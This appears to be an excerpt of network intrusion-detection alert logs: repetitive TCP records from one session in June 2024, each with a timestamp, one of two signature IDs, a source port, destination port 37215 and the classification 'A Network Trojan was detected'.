              Timestamp:06/13/24-21:32:09.436761
              SID:2835222
              Source Port:51548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213640
              SID:2835222
              Source Port:34816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045687
              SID:2835222
              Source Port:57904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401531
              SID:2835222
              Source Port:46502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230963
              SID:2829579
              Source Port:52482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.949872
              SID:2835222
              Source Port:39170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456159
              SID:2835222
              Source Port:34468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165159
              SID:2829579
              Source Port:45920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676780
              SID:2835222
              Source Port:43400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224449
              SID:2829579
              Source Port:52830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990465
              SID:2829579
              Source Port:45186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456947
              SID:2835222
              Source Port:37648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156569
              SID:2835222
              Source Port:42774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440282
              SID:2835222
              Source Port:48094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355337
              SID:2835222
              Source Port:53628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227771
              SID:2835222
              Source Port:44324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833563
              SID:2835222
              Source Port:46536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551069
              SID:2835222
              Source Port:46636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609744
              SID:2835222
              Source Port:41322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995407
              SID:2835222
              Source Port:60450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839184
              SID:2835222
              Source Port:46126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180623
              SID:2835222
              Source Port:40196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992589
              SID:2829579
              Source Port:49672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635190
              SID:2829579
              Source Port:42110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274530
              SID:2829579
              Source Port:42850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.702465
              SID:2835222
              Source Port:44694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836728
              SID:2829579
              Source Port:34444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420416
              SID:2835222
              Source Port:39710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544536
              SID:2835222
              Source Port:52526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173998
              SID:2829579
              Source Port:48398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241351
              SID:2835222
              Source Port:38158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026837
              SID:2835222
              Source Port:53350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843863
              SID:2829579
              Source Port:44408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272036
              SID:2835222
              Source Port:46302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090715
              SID:2835222
              Source Port:55602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822422
              SID:2829579
              Source Port:36176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174661
              SID:2835222
              Source Port:47342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275597
              SID:2835222
              Source Port:48552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545626
              SID:2835222
              Source Port:57772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676106
              SID:2829579
              Source Port:49630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758644
              SID:2835222
              Source Port:57176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214520
              SID:2829579
              Source Port:57174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154765
              SID:2835222
              Source Port:43038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401335
              SID:2829579
              Source Port:38616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506249
              SID:2829579
              Source Port:47276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372727
              SID:2829579
              Source Port:51604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.101970
              SID:2829579
              Source Port:55084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310192
              SID:2835222
              Source Port:48514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.937651
              SID:2835222
              Source Port:40648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155498
              SID:2835222
              Source Port:54136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757888
              SID:2829579
              Source Port:36812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836144
              SID:2829579
              Source Port:43186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940564
              SID:2835222
              Source Port:34320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409196
              SID:2835222
              Source Port:40252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027868
              SID:2829579
              Source Port:56712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524386
              SID:2829579
              Source Port:39628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222950
              SID:2835222
              Source Port:55118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943763
              SID:2829579
              Source Port:45202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090462
              SID:2829579
              Source Port:53474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885081
              SID:2835222
              Source Port:42200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016304
              SID:2835222
              Source Port:49586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422400
              SID:2835222
              Source Port:56638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710120
              SID:2835222
              Source Port:42300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914209
              SID:2835222
              Source Port:55972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110826
              SID:2829579
              Source Port:34316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546991
              SID:2835222
              Source Port:36214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914457
              SID:2829579
              Source Port:39094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697123
              SID:2829579
              Source Port:51708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269415
              SID:2835222
              Source Port:42646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991143
              SID:2835222
              Source Port:34546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727429
              SID:2829579
              Source Port:33418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.938624
              SID:2835222
              Source Port:39596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844172
              SID:2835222
              Source Port:52406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752757
              SID:2835222
              Source Port:51572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195779
              SID:2835222
              Source Port:53998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872079
              SID:2835222
              Source Port:40098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572563
              SID:2835222
              Source Port:51526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988144
              SID:2829579
              Source Port:55954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842402
              SID:2835222
              Source Port:57144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802338
              SID:2829579
              Source Port:43902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376520
              SID:2829579
              Source Port:57968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405292
              SID:2835222
              Source Port:55218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276773
              SID:2829579
              Source Port:49756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092305
              SID:2835222
              Source Port:34986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177349
              SID:2835222
              Source Port:42398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696335
              SID:2835222
              Source Port:33290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800545
              SID:2829579
              Source Port:48490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669329
              SID:2835222
              Source Port:60776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090254
              SID:2829579
              Source Port:50552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658499
              SID:2829579
              Source Port:41950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011317
              SID:2829579
              Source Port:56228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403082
              SID:2829579
              Source Port:50826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476213
              SID:2829579
              Source Port:60316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451941
              SID:2835222
              Source Port:50330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369171
              SID:2835222
              Source Port:46564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358950
              SID:2835222
              Source Port:60374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480279
              SID:2829579
              Source Port:39402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127352
              SID:2829579
              Source Port:44570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725301
              SID:2835222
              Source Port:54684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026335
              SID:2829579
              Source Port:34528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787877
              SID:2829579
              Source Port:54474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318749
              SID:2829579
              Source Port:35274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480840
              SID:2835222
              Source Port:54262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630984
              SID:2835222
              Source Port:38280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358097
              SID:2835222
              Source Port:56856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156616
              SID:2829579
              Source Port:41518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952898
              SID:2829579
              Source Port:53230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554102
              SID:2835222
              Source Port:43584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074830
              SID:2829579
              Source Port:47548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731753
              SID:2829579
              Source Port:46690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.054967
              SID:2835222
              Source Port:37486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727768
              SID:2835222
              Source Port:38264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969577
              SID:2835222
              Source Port:33936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217689
              SID:2835222
              Source Port:47016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707281
              SID:2835222
              Source Port:47764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298351
              SID:2829579
              Source Port:37274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503171
              SID:2829579
              Source Port:42334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153899
              SID:2829579
              Source Port:33944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240818
              SID:2835222
              Source Port:51710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126109
              SID:2829579
              Source Port:38750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630852
              SID:2835222
              Source Port:50714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696022
              SID:2835222
              Source Port:50286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752103
              SID:2835222
              Source Port:33646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438497
              SID:2835222
              Source Port:39900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354288
              SID:2829579
              Source Port:43328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090387
              SID:2835222
              Source Port:55030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609067
              SID:2835222
              Source Port:41444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573538
              SID:2835222
              Source Port:57132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870558
              SID:2835222
              Source Port:53602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307972
              SID:2829579
              Source Port:52796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.277222
              SID:2835222
              Source Port:54424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523463
              SID:2835222
              Source Port:37528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424038
              SID:2835222
              Source Port:49136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569777
              SID:2829579
              Source Port:49088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404102
              SID:2835222
              Source Port:41866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306689
              SID:2835222
              Source Port:55298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137648
              SID:2829579
              Source Port:57552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107196
              SID:2829579
              Source Port:43022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456575
              SID:2835222
              Source Port:49470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.131208
              SID:2829579
              Source Port:57980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195300
              SID:2829579
              Source Port:40482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785330
              SID:2835222
              Source Port:43254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.753443
              SID:2835222
              Source Port:48422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128553
              SID:2829579
              Source Port:42286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309543
              SID:2835222
              Source Port:38558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377977
              SID:2829579
              Source Port:44144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886976
              SID:2835222
              Source Port:36748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124075
              SID:2835222
              Source Port:56812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987243
              SID:2829579
              Source Port:41080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832780
              SID:2829579
              Source Port:41192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026719
              SID:2835222
              Source Port:42852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402844
              SID:2829579
              Source Port:50782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731196
              SID:2829579
              Source Port:55374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401385
              SID:2835222
              Source Port:56284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569995
              SID:2835222
              Source Port:39608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909036
              SID:2835222
              Source Port:37690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266241
              SID:2829579
              Source Port:39360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801516
              SID:2829579
              Source Port:53348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153884
              SID:2829579
              Source Port:41196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133391
              SID:2829579
              Source Port:47258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094596
              SID:2829579
              Source Port:46862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095646
              SID:2829579
              Source Port:34752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991598
              SID:2829579
              Source Port:49326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027511
              SID:2835222
              Source Port:36956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440466
              SID:2829579
              Source Port:55288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.171468
              SID:2829579
              Source Port:50704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347187
              SID:2829579
              Source Port:46274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102199
              SID:2835222
              Source Port:46004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612368
              SID:2829579
              Source Port:49686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377939
              SID:2829579
              Source Port:38388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609607
              SID:2829579
              Source Port:55480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680468
              SID:2835222
              Source Port:53736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415385
              SID:2829579
              Source Port:47372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240958
              SID:2829579
              Source Port:60220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107513
              SID:2835222
              Source Port:59876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316240
              SID:2835222
              Source Port:42960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570695
              SID:2835222
              Source Port:36472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914051
              SID:2829579
              Source Port:51542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151300
              SID:2835222
              Source Port:59456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278981
              SID:2835222
              Source Port:57660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358063
              SID:2835222
              Source Port:36748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805485
              SID:2835222
              Source Port:35038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554750
              SID:2829579
              Source Port:43138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484738
              SID:2835222
              Source Port:57330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175738
              SID:2829579
              Source Port:45676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657575
              SID:2829579
              Source Port:47864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271835
              SID:2835222
              Source Port:50050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787361
              SID:2835222
              Source Port:54786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502751
              SID:2829579
              Source Port:58192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609549
              SID:2835222
              Source Port:41428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838355
              SID:2829579
              Source Port:41724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487044
              SID:2829579
              Source Port:50886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992515
              SID:2835222
              Source Port:45572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940354
              SID:2835222
              Source Port:49852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.338635
              SID:2835222
              Source Port:59978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.780102
              SID:2829579
              Source Port:37836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555256
              SID:2835222
              Source Port:59104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277127
